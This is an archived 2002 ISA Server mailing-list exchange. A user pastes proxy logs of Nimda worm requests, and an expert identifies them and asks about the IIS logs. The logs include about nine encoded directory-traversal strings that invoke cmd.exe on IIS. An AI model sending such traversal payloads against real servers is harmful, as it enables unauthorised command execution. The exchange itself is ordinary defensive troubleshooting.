Those are Nimda requests. Since the sc-result code is 401 for all of them, it appears that ISA may be allowing them to pass. "401" could be coming from ISA or the IIS service. What entries do you find in the IIS logs? Jim Harrison MCP(NT4, W2K), A+, Network+, PCG http://isaserver.org/authors/harrison/ Read the books! ----- Original Message ----- From: "Vinaykumar G" <G.Vinay@xxxxxxxxx> To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx> Sent: Sunday, February 24, 2002 19:44 Subject: [isalist] ISA logs. http://www.ISAserver.org Hi Jim, This is what iam getting in the ISA logs and I have denoted xxx.xxx.xx.xx is pointing some valid IP on the Internet. Then if the IP is valid one on the Internet then these scripts are coming from internet. Please confirm as what has to be done to stop these scripts being executed. xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:04 w3proxy ISA - www - - - 145 3518 http TCP GET http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c. ./winnt/system32/cmd.exe?/c+dir - - 401 - - - xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:06 w3proxy ISA - www - - - 97 3518 http TCP GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir - - 401 - - - xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:08 w3proxy ISA - www - - - 97 3518 http TCP GET http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir - - 401 - - - - - Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Fetch API Request N 2002-02-23 05:57:08 w3proxy xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:10 w3proxy ISA - www - - - 97 3518 http TCP GET http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir - - 401 - - - - - Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Fetch API Request N 2002-02-23 05:57:11 w3proxy anonymous - N 2002-02-23 05:57:11 w3proxy ISA - www - - - 97 3518 http TCP GET http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir - - 401 - - - xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:13 w3proxy ISA - www - - - 98 3518 http TCP GET http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir - - 401 - - - xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:15 w3proxy ISA - www - - - 96 3518 http TCP GET http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir - - 401 - - - - xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:17 w3proxy ISA - www - - - 100 3518 http TCP GET http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir - - 401 - - - xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:19 w3proxy ISA - www - - - 96 3518 http TCP GET http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir - - 401 - - - Regards, vinay. ------------------------------------------------------ You are currently subscribed to this ISAserver.org Discussion List as: jim@xxxxxxxxxxxx To unsubscribe send a blank email to $subst('Email.Unsub')